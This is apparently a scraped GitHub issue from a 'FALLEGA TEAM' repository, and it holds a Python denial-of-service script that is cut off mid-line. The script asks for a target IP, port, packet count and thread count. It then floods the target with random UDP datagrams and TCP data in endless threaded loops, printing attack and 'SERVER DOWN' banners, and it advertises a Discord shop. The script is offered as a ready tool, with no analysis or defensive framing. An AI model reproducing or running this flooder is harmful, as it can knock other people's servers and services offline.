ELDOB / DDOS-FALLEGA

𝐅𝐀𝐋𝐋𝐄𝐆𝐀 𝐓𝐄𝐀𝐌
1 stars 2 forks source link

ddos #1

Open Mohax69 opened 1 year ago

PYROFALLEGAHEDI1213 commented 1 year ago

 1.8 KB

import randomimport socketimport threading print("\033[92m")print(""" Tools by: █████ ████ █ █ ██████ ███ █ █ █ █ █ █ █ █████ █ █ █ █ ██████ █ █ █ ███████ █ █ █ █ █ █ █ █ ██████ ██████ ██████ ████ Creat by ELDOB#7040FALLEGA SHOP https://discord.gg/yhHfTrRDMy""")print("\033[97m")ip= str(input(" ip :"))port= int(input(" port :"))choice = str(input(" Ddos Attack?? (y/n):"))times= int(input(" Paket :"))threads= int(input(" threads :"))def run(): data = random._urandom(1024) i = random.choice(("[-]","[•]","[×]")) while True: try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) addr = (str(ip),int(port)) for x in range(times): s.sendto(data,addr) print(i +" FALLEGA TEAM DDOS ATTACK!!!") except: print("[!] SERVER DOWN!!!") def run2(): data = random._urandom(16) i = random.choice(("[-]","[•]","[×]")) while True: try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip,port)) s.send(data) for x in range(times): s.send(data) print(i +" FALLEGA TEAM DDOS ATTACK!!!") except: s.close() print("[*] SERVER